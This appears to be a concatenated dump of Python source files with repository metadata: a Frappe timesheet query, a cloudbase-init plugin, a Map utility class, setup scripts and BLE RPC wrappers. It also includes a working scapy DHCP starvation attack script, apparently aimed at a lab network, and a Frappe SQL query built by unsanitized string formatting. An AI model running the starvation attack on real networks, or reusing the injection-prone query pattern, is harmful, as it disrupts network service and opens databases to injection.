| 31.061983 | 85 | 0.624584 | 925 | 7,517 | 4.995676 | 0.291892 | 0.047825 | 0.04934 | 0.012984 | 0.112097 | 0.072712 | 0.043281 | 0.009522 | 0 | 0 | 0 | 0.000564 | 0.292803 | 7,517 | 241 | 86 | 31.190871 | 0.868698 | 0.476919 | 0 | 0.082192 | 0 | 0 | 0.019158 | 0.006595 | 0 | 0 | 0 | 0 | 0 | 1 | 0.219178 | false | 0 | 0.109589 | 0 | 0.684932 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 2 |
4b254f85ca684200ef8973061a3a39dab730b676 | 2,632 | py | Python | spo/utils/mandat_invoice.py | libracore/spo | c6617a4624d683e27ee3fde745313c30504f3fd1 | [
"MIT"
] | null | null | null | spo/utils/mandat_invoice.py | libracore/spo | c6617a4624d683e27ee3fde745313c30504f3fd1 | [
"MIT"
] | 6 | 2019-08-23T18:36:26.000Z | 2019-11-12T13:12:12.000Z | spo/utils/mandat_invoice.py | libracore/spo | efff6da53a776c4483f06d9ef1acc8a7aa96b28e | [
"MIT"
] | 1 | 2021-08-14T22:22:43.000Z | 2021-08-14T22:22:43.000Z | # -*- coding: utf-8 -*-
# Copyright (c) 2019, libracore and contributors
# For license information, please see license.txt
from __future__ import unicode_literals
import frappe
@frappe.whitelist()
def get_mandat_logs(mandat):
    mandat = frappe.get_doc("Mandat", mandat)
    referenz_anfrage = mandat.anfragen
    if referenz_anfrage:
        referenz_anfrage = " OR `spo_referenz` = '{referenz_anfrage}'".format(referenz_anfrage=referenz_anfrage)
    else:
        referenz_anfrage = ''

    # Parentheses around the OR chain so that the `nicht_verrechnen` filter
    # applies to every branch (plain AND/OR precedence excluded it before)
    logs = frappe.db.sql("""SELECT
            `tabTimesheet Detail`.`hours`,
            `tabTimesheet Detail`.`spo_dokument`,
            `tabTimesheet Detail`.`spo_remark`,
            `tabTimesheet Detail`.`from_time`,
            `tabTimesheet Detail`.`owner`,
            `employee` AS `employee_name`
        FROM `tabTimesheet Detail`
        INNER JOIN `tabEmployee` ON `tabTimesheet Detail`.`owner` = `tabEmployee`.`user_id`
        WHERE
            `tabTimesheet Detail`.`nicht_verrechnen` != 1
            AND (`tabTimesheet Detail`.`spo_referenz` = '{reference}'
                OR `tabTimesheet Detail`.`spo_referenz` IN (
                    SELECT `name` FROM `tabAnforderung Patientendossier` WHERE `mandat` = '{reference}')
                OR `tabTimesheet Detail`.`spo_referenz` IN (
                    SELECT `name` FROM `tabMedizinischer Bericht` WHERE `mandat` = '{reference}')
                OR `tabTimesheet Detail`.`spo_referenz` IN (
                    SELECT `name` FROM `tabTriage` WHERE `mandat` = '{reference}')
                OR `tabTimesheet Detail`.`spo_referenz` IN (
                    SELECT `name` FROM `tabVollmacht` WHERE `mandat` = '{reference}')
                OR `tabTimesheet Detail`.`spo_referenz` IN (
                    SELECT `name` FROM `tabAbschlussbericht` WHERE `mandat` = '{reference}')
                {referenz_anfrage})
        ORDER BY `tabTimesheet Detail`.`from_time`, `tabTimesheet Detail`.`idx` ASC""".format(reference=mandat.name, referenz_anfrage=referenz_anfrage), as_dict=True)
    return {
        'logs': logs,
        'rsv': mandat.rsv,
        'rate': mandat.stundensatz
} | 59.818182 | 191 | 0.50228 | 209 | 2,632 | 6.167464 | 0.368421 | 0.223429 | 0.130334 | 0.134988 | 0.319628 | 0.319628 | 0.251358 | 0.251358 | 0.251358 | 0.251358 | 0 | 0.003805 | 0.400836 | 2,632 | 44 | 192 | 59.818182 | 0.81357 | 0.044073 | 0 | 0.128205 | 0 | 0 | 0.779757 | 0.099595 | 0 | 0 | 0 | 0 | 0 | 1 | 0.025641 | false | 0 | 0.051282 | 0 | 0.102564 | 0 | 0 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 2 |
# aula15/programa01.py (NicoCassio/cursoemvideo-python, MIT)
i = 1
while True:
print(i)
i += 1
if i > 10:
break
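The sentinel loop above prints 1 through 10 and then breaks; the same behavior as a bounded loop, shown as a sketch:

```python
# Equivalent, more idiomatic form of the while True / break counter.
for i in range(1, 11):
    print(i)
```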
# cloudbaseinit/plugins/common/createuser.py (micumatei/cloudbase-init, Apache-2.0)
# Copyright 2012 Cloudbase Solutions Srl
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import abc
from oslo_log import log as oslo_logging
import six
from cloudbaseinit import conf as cloudbaseinit_conf
from cloudbaseinit.osutils import factory as osutils_factory
from cloudbaseinit.plugins.common import base
from cloudbaseinit.plugins.common import constants
CONF = cloudbaseinit_conf.CONF
LOG = oslo_logging.getLogger(__name__)
@six.add_metaclass(abc.ABCMeta)
class BaseCreateUserPlugin(base.BasePlugin):
"""This is a base class for creating or modifying an user."""
@abc.abstractmethod
def create_user(self, username, password, osutils):
"""Create a new username, with the given *username*.
This will be called by :meth:`~execute`, whenever
a new user must be created.
"""
@abc.abstractmethod
def post_create_user(self, user_name, password, osutils):
"""Executes post user creation logic.
This will be called after by :meth:`~execute`, after
the user is created or the user password is updated.
"""
@staticmethod
def _get_password(osutils):
# Generate a temporary random password to be replaced
# by SetUserPasswordPlugin (starting from Grizzly)
maximum_length = osutils.get_maximum_password_length()
return osutils.generate_random_password(maximum_length)
def execute(self, service, shared_data):
user_name = service.get_admin_username() or CONF.username
shared_data[constants.SHARED_DATA_USERNAME] = user_name
osutils = osutils_factory.get_os_utils()
password = self._get_password(osutils)
if CONF.rename_admin_user:
admin_user_name = [u for u in osutils.enum_users()
if osutils.is_builtin_admin(u)][0]
if admin_user_name.lower() != user_name.lower():
LOG.info('Renaming builtin admin user "%(admin_user_name)s" '
'to %(new_user_name)s and setting password',
{'admin_user_name': admin_user_name,
'new_user_name': user_name})
osutils.rename_user(admin_user_name, user_name)
osutils.set_user_password(user_name, password)
else:
LOG.info('"%s" is already the name of the builtin admin '
'user, skipping renaming', user_name)
elif osutils.user_exists(user_name):
LOG.info('Setting password for existing user "%s"', user_name)
osutils.set_user_password(user_name, password)
else:
LOG.info('Creating user "%s" and setting password', user_name)
self.create_user(user_name, password, osutils)
# TODO(alexpilotti): encrypt with DPAPI
shared_data[constants.SHARED_DATA_PASSWORD] = password
self.post_create_user(user_name, password, osutils)
for group_name in CONF.groups:
try:
osutils.add_user_to_local_group(user_name, group_name)
except Exception:
LOG.exception('Cannot add user to group "%s"', group_name)
return base.PLUGIN_EXECUTION_DONE, False
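`BaseCreateUserPlugin` combines `@six.add_metaclass(abc.ABCMeta)` with `@abc.abstractmethod` so that concrete plugins are forced to implement the hooks. A minimal stdlib sketch of that contract (`DemoPlugin` is illustrative, not part of cloudbase-init):

```python
import abc

class BaseCreateUser(abc.ABC):  # py3 spelling of six.add_metaclass(abc.ABCMeta)
    @abc.abstractmethod
    def create_user(self, username, password):
        """Concrete plugins must provide this."""

class DemoPlugin(BaseCreateUser):
    def create_user(self, username, password):
        return "created %s" % username

try:
    BaseCreateUser()  # abstract: instantiation is refused
except TypeError:
    print("abstract base cannot be instantiated")

print(DemoPlugin().create_user("admin", "pw"))  # created admin
```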
# carriage/map.py (d2207197/maybee, Apache-2.0)
import heapq
import itertools as itt
import operator as op
from collections import OrderedDict, UserDict, defaultdict
from .array import Array
from .optional import Nothing, Some
from .repr import short_repr
from .row import KeyValue, Row
from .stream import Stream
def identity(_): return _
class Map(OrderedDict):
'''A mutable dictionary enhanced with a bulk of useful methods.
'''
def items(self):
return Stream(super().items()).starmap(KeyValue)
def values(self):
return Stream(super().values())
def keys(self):
return Stream(super().keys())
def update(self, *args, **kwds):
'''Update Map from dict/iterable and ``return self``
>>> m = Map(a=3, b=4)
>>> m2 = m.update(a=5, c=3).update({'d': 2})
>>> m is m2
True
>>> m
Map({'a': 5, 'b': 4, 'c': 3, 'd': 2})
'''
super().update(*args, **kwds)
return self
def updated(self, *args, **kwds):
'''Create a new Map instance that is updated from dict/iterable.
This method is the same as ``m.copy().update(...)``
>>> m = Map(a=3, b=4)
>>> m2 = m.updated(a=5, c=3).update({'d': 2})
>>> m2
Map({'a': 5, 'b': 4, 'c': 3, 'd': 2})
>>> m
Map({'a': 3, 'b': 4})
'''
m = self.copy()
return m.update(*args, **kwds)
def join(self, *others, fillvalue=None, agg=None):
"""Create a new Map instance with keys merged and values joined.
>>> m1 = Map(a=1, b=2)
>>> m2 = m1.join(dict(a=3, b=4, c=5))
>>> m2 is m1
False
>>> m2
Map({'a': Row(f0=1, f1=3), 'b': Row(f0=2, f1=4), 'c': Row(f0=None, f1=5)})
>>> m1 = Map(a=1, b=2)
>>> m2 = m1.join(dict(a=3, b=4, c=5), agg=sum, fillvalue=0)
>>> m2
Map({'a': 4, 'b': 6, 'c': 5})
"""
return Map(self.iter_joined(*others, fillvalue=fillvalue, agg=agg))
def iter_joined(self, *others, fillvalue=None, agg=None):
"""Create a ``Row(key, Row(v0, v1, ...))`` iterator with keys from
all Maps and value joined.
>>> m = Map(a=1, b=2)
>>> l = list(m.iter_joined(
... Map(a=3, b=4, c=5),
... Map(a=6, c=7),
... fillvalue=0))
>>> l[0]
Row(key='a', values=Row(f0=1, f1=3, f2=6))
>>> l[1]
Row(key='b', values=Row(f0=2, f1=4, f2=0))
>>> l[2]
Row(key='c', values=Row(f0=0, f1=5, f2=7))
"""
if agg is None:
agg = identity
keys = list(self.keys())
keys_set = set(keys)
for other in others:
for key in other.keys():
if key not in keys_set:
keys_set.add(key)
keys.append(key)
dicts = (self,) + others
for key in keys:
yield Row(key=key,
values=agg(Row.from_values(
d.get(key, fillvalue)
for d in dicts)))
def __repr__(self):
return f'Map({self.make_string()})'
def map(self, func):
'''Create a new Map instance that each key, value pair is derived by
applying function to original key, value.
>>> Map(a=3, b=4).map(lambda k, v: (v, k))
Map({3: 'a', 4: 'b'})
Parameters
----------
func : ``pred(key, value) -> (key, value)``
function for computing new key/value pair
'''
return Map(func(key, value) for key, value in self.items())
def map_keys(self, func):
'''Create a new Map instance that all values remains the same,
while each corresponding key is updated by applying function to
original key, value.
>>> Map(a=3, b=4).map_keys(lambda k, v: k + '_1')
Map({'a_1': 3, 'b_1': 4})
Parameters
----------
func : ``pred(key, value) -> key``
function for computing new keys
'''
return Map((func(key, value), value) for key, value in self.items())
def map_values(self, func):
'''Create a new Map instance that all keys remains the same,
while each corresponding value is updated by applying function to
original key, value.
>>> Map(a=3, b=4).map_values(lambda k, v: v * 2)
Map({'a': 6, 'b': 8})
Parameters
----------
func : ``pred(key, value) -> value``
function for computing new values
'''
return Map((key, func(key, value)) for key, value in self.items())
def revamp_values(self, func):
'''Update values of current Map and return self.
Each value is derived by computing the function using
both key and value.
>>> m = Map(a=3, b=4)
>>> m.revamp_values(lambda k, v: v * 2)
Map({'a': 6, 'b': 8})
>>> m
Map({'a': 6, 'b': 8})
Parameters
----------
func : ``pred(key, value) -> value``
function for computing new values
Returns
-------
self
'''
for key, value in self.items():
self[key] = func(key, value)
return self
def keep(self, *keys):
'''Delete keys not specified and return self
>>> m = Map(a=3, b=4, c=5)
>>> m.keep('a', 'c')
Map({'a': 3, 'c': 5})
>>> m
Map({'a': 3, 'c': 5})
Returns
-------
self
'''
keys = set(keys)
current_keys = set(self.keys())
keys_to_delete = current_keys - keys
        for key in keys_to_delete:
            del self[key]
return self
def project(self, *keys):
'''Create a new Map instance contains only specified keys.
>>> m = Map(a=3, b=4, c=5)
>>> m.project('a', 'c')
Map({'a': 3, 'c': 5})
>>> m
Map({'a': 3, 'b': 4, 'c': 5})
Returns
-------
Map[key, value]
'''
return Map((k, self[k]) for k in keys)
def get_opt(self, key):
'''Get the value of specified key as Optional type.
Return Some(value) if key exists, otherwise return Nothing.
>>> m = Map(a=3, b=4)
>>> m.get_opt('a')
Some(3)
>>> m.get_opt('c')
Nothing
>>> m.get_opt('a').map(lambda v: v * 2)
Some(6)
>>> m.get_opt('c').map(lambda v: v * 2)
Nothing
Returns
-------
Optional[value]
'''
if key in self:
return Some(self[key])
return Nothing
def remove(self, *keys):
'''Delete keys and return self
>>> m = Map(a=3, b=4, c=5)
>>> m.remove('a', 'c')
Map({'b': 4})
>>> m
Map({'b': 4})
Returns
-------
self
'''
for key in keys:
del self[key]
return self
def without(self, *keys):
'''Create a new Map instance with those keys
>>> m = Map(a=3, b=4, c=6)
>>> m.without('a', 'c')
Map({'b': 4})
>>> m
Map({'a': 3, 'b': 4, 'c': 6})
Returns
-------
Map[key, value]
'''
return Map((key, value)
for key, value in self.items()
if key not in keys)
def retain(self, pred):
'''Delete key/value pairs not satisfying the predicate and return self
>>> m = Map(a=3, b=4, c=5)
>>> m.retain(lambda k, v: k == 'b' or v == 5)
Map({'b': 4, 'c': 5})
>>> m
Map({'b': 4, 'c': 5})
Parameters
----------
pred : ``(k, v) -> bool``
Returns
-------
self
'''
keys_to_delete = []
for key, value in self.items():
if not pred(key, value):
keys_to_delete.append(key)
return self.remove(*keys_to_delete)
def retain_false(self, pred):
'''Delete key/value pairs satisfying the predicate and return self
>>> m = Map(a=3, b=4, c=5)
>>> m.retain_false(lambda k, v: k == 'b' or v == 5)
Map({'a': 3})
>>> m
Map({'a': 3})
Parameters
----------
pred : ``(k, v) -> bool``
Returns
-------
self
'''
keys_to_delete = []
for key, value in self.items():
if pred(key, value):
keys_to_delete.append(key)
return self.remove(*keys_to_delete)
def retain_by_key(self, pred):
'''Delete key/value pairs not satisfying the predicate and return self
>>> m = Map(a=3, b=4, c=5)
>>> m.retain_by_key(lambda k: k == 'b')
Map({'b': 4})
>>> m
Map({'b': 4})
Parameters
----------
pred : ``(k) -> bool``
Returns
-------
self
'''
keys_to_delete = []
for key, value in self.items():
if not pred(key):
keys_to_delete.append(key)
return self.remove(*keys_to_delete)
def retain_by_value(self, pred):
'''Delete key/value pairs not satisfying the predicate and return self
>>> m = Map(a=3, b=4, c=5)
>>> m.retain_by_value(lambda v: v == 4)
Map({'b': 4})
>>> m
Map({'b': 4})
Parameters
----------
pred : ``(k) -> bool``
Returns
-------
self
'''
keys_to_delete = []
for key, value in self.items():
if not pred(value):
keys_to_delete.append(key)
return self.remove(*keys_to_delete)
def filter(self, pred):
'''Create a new Map with key/value pairs satisfying the predicate
>>> m = Map({1: 2, 2: 4, 3: 6})
>>> m2 = m.filter(lambda k, v: (v-k) % 3 == 0)
>>> m2
Map({3: 6})
Parameters
----------
pred : ``(k, v) -> bool``
predicate
Returns
-------
Map[key, value]
'''
return Map((k, v) for k, v in self.items() if pred(k, v))
def filter_false(self, pred):
'''Create a new Map with key/value pairs not satisfying the predicate
>>> m = Map({1: 2, 2: 4, 3: 6})
>>> m2 = m.filter_false(lambda k, v: (v-k) % 3 == 0)
>>> m2
Map({1: 2, 2: 4})
Parameters
----------
pred : ``(k, v) -> bool``
predicate
Returns
-------
Map[key, value]
'''
return Map((k, v) for k, v in self.items() if not pred(k, v))
def filter_by_key(self, pred):
'''Create a new Map with keys satisfying the predicate
>>> m = Map({1: 2, 2: 4, 3: 6})
>>> m2 = m.filter_by_key(lambda k: k % 3 == 0)
>>> m2
Map({3: 6})
Parameters
----------
pred : ``(k, v) -> bool``
predicate
Returns
-------
Map[key, value]
'''
return Map((k, v) for k, v in self.items() if pred(k))
def filter_by_value(self, pred):
'''Create a new Map with values satisfying the predicate
>>> m = Map({1: 2, 2: 4, 3: 6})
>>> m2 = m.filter_by_value(lambda v: v % 3 == 0)
>>> m2
Map({3: 6})
Parameters
----------
pred : ``(k, v) -> bool``
predicate
Returns
-------
Map[key, value]
'''
return Map((k, v) for k, v in self.items() if pred(v))
def group_by(self, key_func):
'''Group key/value pairs into nested Maps.
>>> Map(a=3, b=4, c=5).group_by(lambda k, v: v % 2)
Map({1: Map({'a': 3, 'c': 5}), 0: Map({'b': 4})})
Parameters
----------
key_func : ``(key, value) -> group_key``
predicate
Returns
-------
Map[key_func(key), Map[key, value]]
'''
grouped_d = defaultdict(Map)
for key, value in self.items():
grouped_d[key_func(key, value)][key] = value
return Map(grouped_d)
def reduce(self, key):
pass
def make_string(self,
key_value_format='{key!r}: {value!r}',
start='{', item_sep=', ', end='}'):
'''Construct a string from key/values.
>>> m = Map(a=3, b=4, c=5)
>>> m.make_string()
"{'a': 3, 'b': 4, 'c': 5}"
>>> m.make_string(start='(', key_value_format='{key}={value!r}',
... item_sep=', ', end=')')
'(a=3, b=4, c=5)'
Parameters
----------
key_value_format : str
string template using builtin ``str.format()`` for formatting
key/value pairs. Default to ``'{key!r}: {value!r}'``.
Available named placeholders: ``{key}``, ``{value}``
start : str
Default to ``'{'``.
item_sep : str
Default to ``', '``
end : str
Default to ``}``
Returns
-------
str
'''
items_str = item_sep.join(
key_value_format.format(key=key, value=value)
for key, value in self.items())
return start + items_str + end
def take(self, n):
'''create a Stream instance of first ``n`` ``Row(key, value)`` elements.
>>> m = Map(a=4, b=5, c=6, d=7)
>>> m.take(2).to_list()
[Row(key='a', value=4), Row(key='b', value=5)]
Returns
-------
Stream[Row[key, value]]
'''
return self.to_stream().take(n)
def first(self):
'''Get the first item in ``Row(key, value)`` type
>>> m = Map(a=4, b=5, c=6, d=7)
>>> m.first()
Row(key='a', value=4)
>>> m.first().key
'a'
>>> m.first().value
4
>>> m = Map()
>>> m.first()
Traceback (most recent call last):
...
IndexError: index out of range.
Returns
-------
Row[key, value]
'''
return self.nth(0)
def first_opt(self):
'''Optionally get the first item.
Return Some(Row(key, value)) if first item exists,
otherwise return Nothing
>>> m = Map(a=4, b=5, c=6, d=7)
>>> m.first_opt().map(lambda kv: kv.transform(value=lambda v: v * 2))
Some(Row(key='a', value=8))
>>> m.first_opt().map(lambda kv: kv.value)
Some(4)
>>> m = Map()
>>> m.first_opt()
Nothing
Returns
-------
Optional[Row[key, value]]
'''
return self.nth_opt(0)
def nth(self, index):
'''Get the nth item in ``Row(key, value)`` type.
>>> m = Map(a=4, b=5, c=6, d=7)
>>> m.nth(2)
Row(key='c', value=6)
>>> m = Map(a=4, b=5)
>>> m.nth(2)
Traceback (most recent call last):
...
IndexError: index out of range.
Returns
-------
Row[key, value]
'''
try:
key, value = next(itt.islice(self.items(), index, None))
return KeyValue(key, value)
except StopIteration:
raise IndexError('index out of range.')
def nth_opt(self, index):
'''Optionally get the nth item.
Return ``Some(Row(key, value))`` if first item exists,
otherwise return Nothing.
>>> m = Map(a=4, b=5, c=6, d=7)
>>> m.first_opt().map(lambda kv: kv.transform(value=lambda v: v * 2))
Some(Row(key='a', value=8))
>>> m = Map()
>>> m.first_opt()
Nothing
Returns
-------
Optional[Row[key, value]]
'''
try:
return Some(self.nth(index))
except IndexError:
return Nothing
def len(self):
'''Get the length of this Map
>>> m = Map(a=4, b=5, c=6, d=7)
>>> m.len()
4
Returns
-------
int
'''
return len(self)
def to_stream(self, key_field='key', value_field='value'):
'''Convert to a Stream instance of ``Row(key, value)`` iterable.
>>> m = Map(a=4, b=5, c=6, d=7)
>>> m.to_stream().take(2).to_list()
[Row(key='a', value=4), Row(key='b', value=5)]
Returns
-------
Stream[Row[key, value]]
'''
return (Stream(super().items())
.starmap(lambda key, value:
Row(**{key_field: key, value_field: value})))
def to_array(self):
'''Convert to an Array instance of ``Row(key, value)`` iterable.
>>> m = Map(a=4, b=5, c=6, d=7)
>>> m.to_array().take(2)
Array([Row(key='a', value=4), Row(key='b', value=5)])
Returns
-------
Array[Row[key, value]]
'''
return self.to_stream().to_array()
def to_list(self):
'''Convert to an list instance of ``Row(key, value)`` iterable.
>>> m = Map(a=4, b=5)
>>> m.to_list()
[Row(key='a', value=4), Row(key='b', value=5)]
Returns
-------
Array[Row[key, value]]
'''
return self.to_stream().to_list()
def to_dict(self):
'''Convert to dict'''
return dict(self)
def flip(self):
'''Create a new Map which key/value pairs are fliped
>>> m = Map(a=4, b=5, c=6)
>>> m.flip()
Map({4: 'a', 5: 'b', 6: 'c'})
'''
return Map((value, key) for key, value in self.items())
def for_each(self, func):
'''Call func for each key/value pair
>>> m = Map(a=[], b=[], c=[])
>>> m.for_each(lambda k, v: v.append(k))
>>> m
Map({'a': ['a'], 'b': ['b'], 'c': ['c']})
'''
for k, v in self.items():
func(k, v)
def for_each_key(self, func):
'''Call func for each key
>>> m = Map(a=[], b=[], c=[])
>>> keys = []
>>> m.for_each_key(lambda k: keys.append(k))
>>> keys
['a', 'b', 'c']
'''
for k in self.keys():
func(k)
def for_each_value(self, func):
'''Call func for each value
>>> m = Map(a=[], b=[], c=[])
>>> m.for_each_value(lambda v: v.append(3))
>>> m
Map({'a': [3], 'b': [3], 'c': [3]})
'''
for v in self.values():
func(v)
def nlargest_value_items(self, n=None):
'''Get top n largest values
>>> m = Map(a=6, b=2, c=10, d=9)
>>> m.nlargest_value_items(n=2)
Array([Row(key='c', value=10), Row(key='d', value=9)])
Returns
-------
Array[Row[key, value]]
'''
        if n is None:
            vs = sorted(self.items(), key=op.itemgetter(1), reverse=True)
        else:
            vs = heapq.nlargest(n, self.items(), key=op.itemgetter(1))
return Array(vs)
def nsmallest_value_items(self, n=None):
'''Get top n smallest values
>>> m = Map(a=6, b=2, c=10, d=9)
>>> m.nsmallest_value_items(n=2)
Array([Row(key='b', value=2), Row(key='a', value=6)])
Returns
-------
Array[Row[key, value]]
'''
        if n is None:
            vs = sorted(self.items(), key=op.itemgetter(1), reverse=False)
        else:
            vs = heapq.nsmallest(n, self.items(), key=op.itemgetter(1))
return Array(vs)
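`nlargest_value_items` and `nsmallest_value_items` above delegate to `heapq` with an `itemgetter` key; the core call in isolation:

```python
import heapq
import operator as op

scores = {"a": 6, "b": 2, "c": 10, "d": 9}
# Rank key/value pairs by value, descending, keeping only the top two.
top2 = heapq.nlargest(2, scores.items(), key=op.itemgetter(1))
print(top2)  # [('c', 10), ('d', 9)]
```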
# src/titiler/mosaic/titiler/mosaic/version.py (mackdelany/titiler, MIT)
"""titiler.mosaic version."""
__version__ = "0.3.4"
# dhcp_starvation.py (Nuve17/BadSquirrel, Apache-2.0)
from scapy.all import *
from time import sleep
from threading import Thread
class DHCPStarvation(object):
def __init__(self):
# Generated MAC stored to avoid same MAC requesting for different IP
self.mac = [""]
# Requested IP stored to identify registered IP
self.ip = []
def handle_dhcp(self, pkt):
        if DHCP in pkt:
            # A server ACK (message type 5) means the requested IP address
            # is registered; 192.168.100.1 is excluded and not starved.
            if pkt[DHCP].options[0][1] == 5 and pkt[IP].dst != "192.168.100.1":
                self.ip.append(pkt[IP].dst)
                print(str(pkt[IP].dst) + " registered")
            # A NAK (message type 6) can happen due to packet loss
            elif pkt[DHCP].options[0][1] == 6:
                print("NAK received")
def listen(self):
# sniff DHCP packets
sniff(filter="udp and (port 67 or port 68)",
prn=self.handle_dhcp,
store=0)
def start(self):
# start packet listening thread
thread = Thread(target=self.listen)
thread.start()
        print("Starting DHCP starvation...")
        # Keep starving until all 11 generated targets (10.0.2.55 - 10.0.2.65)
        # are registered; starve() only requests those addresses, so a larger
        # threshold would never be reached.
        while len(self.ip) < 11:
            self.starve()
        print("Targeted IP addresses starved")
def starve(self):
        for i in range(0, 11):
            # Generate the IP to request (10.0.2.55 - 10.0.2.65);
            # skip it if it is already registered.
            requested_addr = "10.0.2." + str(55 + i)
if requested_addr in self.ip:
continue
# generate MAC, avoid duplication
src_mac = ""
while src_mac in self.mac:
src_mac = RandMAC()
self.mac.append(src_mac)
# generate DHCP request packet
pkt = Ether(src=src_mac, dst="ff:ff:ff:ff:ff:ff")
pkt /= IP(src="0.0.0.0", dst="255.255.255.255")
pkt /= UDP(sport=68, dport=67)
pkt /= BOOTP(chaddr=RandString(12, "0123456789abcdef"))
pkt /= DHCP(options=[("message-type", "request"),
("requested_addr", requested_addr),
("server_id", "10.0.2.15"),
"end"])
sendp(pkt, iface="vboxnet0",verbose=0)
            print("Trying to occupy " + requested_addr)
            sleep(0.2)  # interval to avoid congestion and packet loss
def start_starvation():
starvation = DHCPStarvation()
starvation.start()
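`starve()` keeps drawing random MACs until one is unused. The same generate-until-fresh pattern with stdlib `random`, as a sketch (a set instead of the script's list makes the membership test O(1)):

```python
import random

seen = {""}  # mirrors the initial self.mac = [""]

def fresh_mac():
    mac = ""
    while mac in seen:  # retry until an unused address appears
        mac = ":".join("%02x" % random.randrange(256) for _ in range(6))
    seen.add(mac)
    return mac

macs = [fresh_mac() for _ in range(5)]
print(len(set(macs)))  # 5
```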
# indico/modules/news/views.py (jgrigera/indico, MIT)
# This file is part of Indico.
# Copyright (C) 2002 - 2020 CERN
#
# Indico is free software; you can redistribute it and/or
# modify it under the terms of the MIT License; see the
# LICENSE file for more details.
from __future__ import unicode_literals
from indico.modules.admin.views import WPAdmin
from indico.util.i18n import _
from indico.web.views import WPDecorated, WPJinjaMixin
class WPNews(WPJinjaMixin, WPDecorated):
template_prefix = 'news/'
title = _('News')
def _get_body(self, params):
return self._get_page_content(params)
class WPManageNews(WPAdmin):
template_prefix = 'news/'
# libsrc/wio_terminal_rtl/rpc/ble/scan.py (t-ikegami/WioTerminal-CircuitPython, MIT)
from .. import MTYPE_INVOKE, perform_request
] | null | null | null | from .. import MTYPE_INVOKE, perform_request
from ...Codec import Codec
# rpc_le_scan_set_param(RPC_T_LE_SCAN_PARAM_TYPE param, in binary value) -> RPC_T_GAP_CAUSE
def set_param(param, value) :
codec = Codec(8, 1, MTYPE_INVOKE, "II{}", "I")
return perform_request(codec, param, value)
# rpc_le_scan_get_param(RPC_T_LE_SCAN_PARAM_TYPE param, out binary value) -> RPC_T_GAP_CAUSE
def get_param(param) :
codec = Codec(8, 2, MTYPE_INVOKE, "I", "I{}I")
return perform_request(codec, param)
# rpc_le_scan_start() -> RPC_T_GAP_CAUSE
def start() :
codec = Codec(8, 3, MTYPE_INVOKE, "", "I")
return perform_request(codec)
# rpc_le_scan_timer_start(uint32 tick) -> RPC_T_GAP_CAUSE
def timer_start(tick) :
codec = Codec(8, 4, MTYPE_INVOKE, "I", "I")
return perform_request(codec, tick)
# rpc_le_scan_stop() -> RPC_T_GAP_CAUSE
def stop() :
codec = Codec(8, 5, MTYPE_INVOKE, "", "I")
return perform_request(codec)
# rpc_le_scan_info_filter(bool enable, uint8 offset, uint8 len, in uint8[31] p_filter) -> bool
def info_filter(enable, offset, len, p_filter) :
codec = Codec(8, 6, MTYPE_INVOKE, "bBB31s", "b")
return perform_request(codec, enable, offset, len, p_filter)
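Each wrapper above hands `Codec` a pair of struct-style format strings for the request and reply payloads. A sketch of what such a format describes, using the stdlib `struct` module (the actual Codec wire format is firmware-specific and only assumed here to be struct-like):

```python
import struct

# "II" describes two unsigned 32-bit integers; '<' fixes little-endian order.
payload = struct.pack("<II", 8, 3)
print(payload.hex())  # 0800000003000000
```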
# setup.py (logicai-io/python-json-logger, BSD-2-Clause)
import sys
if sys.version_info < (2, 7):
    sys.stderr.write("{}: need Python 2.7 or later.\n".format(sys.argv[0]))
    sys.stderr.write("Your Python is {}\n".format(sys.version))
sys.exit(1)
from setuptools import setup, find_packages
setup(
name = "python-json-logger",
version = "0.1.9",
url = "http://github.com/madzak/python-json-logger",
license = "BSD",
description = "A python library adding a json log formatter",
author = "Zakaria Zajac",
author_email = "zak@madzak.com",
package_dir = {'': 'src'},
packages = find_packages("src", exclude="tests"),
test_suite = "tests.tests",
install_requires = ['setuptools'],
classifiers = [
'Development Status :: 3 - Alpha',
'Intended Audience :: Developers',
'License :: OSI Approved :: BSD License',
'Operating System :: OS Independent',
'Programming Language :: Python',
'Programming Language :: Python :: 2',
'Programming Language :: Python :: 2.7',
'Programming Language :: Python :: 3',
'Programming Language :: Python :: 3.4',
'Programming Language :: Python :: 3.5',
'Programming Language :: Python :: 3.6',
'Topic :: System :: Logging',
]
)
#!/usr/bin/env python
# {{cookiecutter.repo_name}}/setup.py (HemuManju/lightning-hydra-template, MIT)
from setuptools import setup, find_packages
setup(
name='{{ cookiecutter.project_name }}',
version='0.0.0',
description='{{ cookiecutter.description }}',
author='{{ cookiecutter.author_name }}',
author_email='',
url='', # replace with your own github repo url
install_requires=['pytorch-lightning', 'hydra-core'],
packages=find_packages(),
license='{% if cookiecutter.open_source_license == 'MIT' %}MIT{% elif cookiecutter.open_source_license == 'BSD-3-Clause' %}BSD-3{% endif %}' # noqa
)
| 36.666667 | 151 | 0.674545 | 65 | 550 | 5.553846 | 0.646154 | 0.066482 | 0.121884 | 0.160665 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.010753 | 0.154545 | 550 | 14 | 152 | 39.285714 | 0.765591 | 0.114545 | 0 | 0 | 0 | 0 | 0.483471 | 0.283058 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0 | 0.083333 | null | null | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 2 |
